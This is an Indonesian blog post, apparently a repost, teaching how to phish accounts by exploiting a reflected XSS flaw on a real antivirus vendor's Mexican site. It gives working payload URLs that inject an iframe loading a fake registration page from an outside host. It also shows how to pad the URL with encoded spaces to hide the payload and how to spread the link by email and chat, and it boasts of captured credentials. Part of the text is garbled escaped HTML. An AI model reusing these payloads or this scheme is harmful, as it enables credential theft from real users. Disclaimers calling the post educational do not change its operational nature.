Tekhnik Membuat Halaman Login Palsu Dengan XSS Attack

Posted on by Kefilhupher

Banyak yang bertanya, apa hebat & bahayanya sih XSS?
Yang tidak mengetahui & belum ber-eksperimen pasti bilang:

*Apa hebatnya sih, cuman nulis di URL doank
*Begituan mah gak ada gunanya
*XSS mah gak bisa dideface halamannya
*Itu kan cuman perubahan address doank

Saya hanya tersenyum ketika mendengar diskusi mengenai hal ini :)
Nah, dari sekian banyak bahayanya XSS, mari kita ambil salah satunya "STEALING ACCOUNT IN VULNERABLE WEBSITE". (Harap Dijadikan Bahan Pembelajaran & Proteksi Diri Saja Ya, Artikel Ini Hanya Untuk Menambah Wawasan)

Dalam hal ini saya memanfaatkan XSS dikombinasikan dengan Human Vulnerability, karena semua pasti sudah mengetahui, bahwa Manusia Adalah Unpatched Vulnerability.
Skenarionya adalah:
1. Kita mendapatkan vulnerable website yang bisa dilakukan XSS
2. Kita membuat sebuah script yang bisa digunakan untuk register / login & membuat sebuah file script (php) yang bisa digunakan untuk mengambil informasi account & menyimpannya di logs.
3. Kita sebarkan linknya ke beberapa email / messenger / chatbox / irc, dsb.
Tunggu & kita mendapatkannya deh.. :)

Langkah-langkahnya adalah :
PERTAMA
* Saya menggunakan vulnerable XSS dari website www.eset.com.mx, ESET merupakan salah satu perusahaan AntiVirus yang juga sangat terkenal di Dunia, namun memiliki kelemahan juga di websitenya.
* Test XSS apakah bisa berjalan di website, berikut contohnya:http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ccenter%3E%3Cfont%20size=%22300%22%3EBinus%20Hacker%20Ada%20Disini%3Cbr%3Ehttp://www.binushacker.net%3C/font%3E%3C/center%3E%3C/

* Test cookies (ternyata ada), berhubung artikelnya bukan stealing cookies, kita lewatin aja :)
* Oke, sudah ketahuan websitenya vulnerable

KEDUA
* Dalam benak, banyak ide, antara login & register pages.
* Akhirnya kembali coding, membuat page halaman register di ESET

* Kemudian membuat php untuk menerima hasil & menyimpannya di log, berikut:

* Fake register tadi yang saya buat saya simpan di http://restinpeace.biz/eset/ (CONTOH), permission filenya sudah disetting supaya tidak bisa dibaca filenya, hanya bisa melihat directorynya. Hehehe.. :D

KETIGA
* Disini kita akan menggunakan html code "iframe"
* Sebelum kita melakukan aksi, maka code XSS:

Code:

&lt;/div&gt;&lt;/div&gt;di encode dulu menjadi:&amp;nbsp;&lt;br&gt;&lt;div&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;div class="code" style="font-family: 'courier new'; border-top-color: rgb(51, 51, 51); border-right-color: rgb(51, 51, 51); border-bottom-color: rgb(51, 51, 51); border-left-color: rgb(51, 51, 51); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: dotted; border-right-style: dotted; border-bottom-style: dotted; border-left-style: dotted; padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px; margin-top: 2px; margin-right: 2px; margin-bottom: 2px; margin-left: 2px; "&gt;%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E&lt;/div&gt;&lt;/div&gt;&lt;br&gt;* Copy code tersebut ke URL sehingga menjadi:&lt;a href="http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&amp;amp;promocode=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E" target="_blank" style="text-decoration: none; "&gt;http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&amp;amp;promocode=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E&lt;/a&gt;&lt;br&gt;&lt;span class="Apple-style-span" style="border-width: initial; border-color: initial; "&gt;&lt;img src="http://farm4.static.flickr.com/3558/5743624347_ee6c2cd204.jpg" alt="img" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; vertical-align: bottom; max-width: 594px; "&gt;&lt;/span&gt;&lt;br&gt;* Karena masih kelihatan di URL, maka kita tambahin menggunakan spasi (? ?), sehingga URL iframe tidak tampak di address karena kepanjangan:&amp;nbsp;&lt;a href="http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&amp;amp;promocode=%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E" target="_blank" style="text-decoration: none; "&gt;http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&amp;amp;promocode=%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E&lt;/a&gt;, sekarang tidak adak kelihatan lagi di URL Address script XSSnya.&lt;br&gt;&lt;span class="Apple-style-span" style="border-width: initial; border-color: initial; "&gt;&lt;img src="http://farm3.static.flickr.com/2187/5744173634_69e9facd0c.jpg" alt="img" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; vertical-align: bottom; max-width: 594px; "&gt;&lt;/span&gt;&lt;br&gt;* Sudah selesai page untuk fake register, lanjut ke step selanjutnya.&lt;br&gt;&lt;br&gt;KEEMPAT&lt;br&gt;* Sebarkan melalui email, chat, messenger dan sebagainya, silakan gunakan cara masing-masing. Anda disini belajar menjadi spammer &amp;amp; phiser (Ingat! Artikel ini hanya untuk pembelajaran, kita tidak akan lebih baik jika melakukan kejahatan, namun akan lebih berguna jika kita memiliki ilmu agar tidak terjebak &amp;amp; tertipu oleh penjahat!)&lt;br&gt;&lt;br&gt;KELIMA&lt;br&gt;* Kita tunggu hasilnya &amp;amp; kita cek log yang masuk&lt;br&gt;* Taaaadddddaaaaaa, ada beberapa yang masuk :D&lt;br&gt;&lt;span class="Apple-style-span" style="border-width: initial; border-color: initial; "&gt;&lt;img src="http://farm6.static.flickr.com/5267/5743694845_2e2f2aca1a.jpg" alt="img" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; vertical-align: bottom; max-width: 594px; "&gt;&lt;/span&gt;&lt;br&gt;&lt;br&gt;Download Source Code :&amp;nbsp;&lt;br&gt;&lt;a href="http://adf.ly/313683/http://www.ziddu.com/download/15073955/XSS-Article-BinusHacker.zip.html" target="_blank" style="text-decoration: none; "&gt;&lt;img src="http://www.binushacker.net/wp-content/uploads/downloads.gif" alt="img" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; vertical-align: bottom; max-width: 594px; "&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;Kita tidak akan menjadi hebat dengan melakukan kejahatan, namun kita akan jauh lebih baik jika mengetahui ilmu pengetahuan, membagi dengan yang lain, memproteksi diri sendiri. Tuhan Akan Melihat Apa Yang Ada Pada Niat Yang Kita Lakukan Bukan Dari Pendapat Orang.&lt;br&gt;&lt;br&gt;Jadi untuk semua selamat belajar &amp;amp; semoga bermanfaat&lt;/span&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Tahoma; font-size: 12px; background-color: rgb(255, 255, 255); "&gt;Courtsey of : www.binusHacker.com&lt;/span&gt;&lt;/div&gt;

Fun And Hi-Tech [ IT Area ]

Advertisement

Tekhnik Membuat Halaman Login Palsu Dengan XSS Attack

Popular Posts

Category

Blog Archive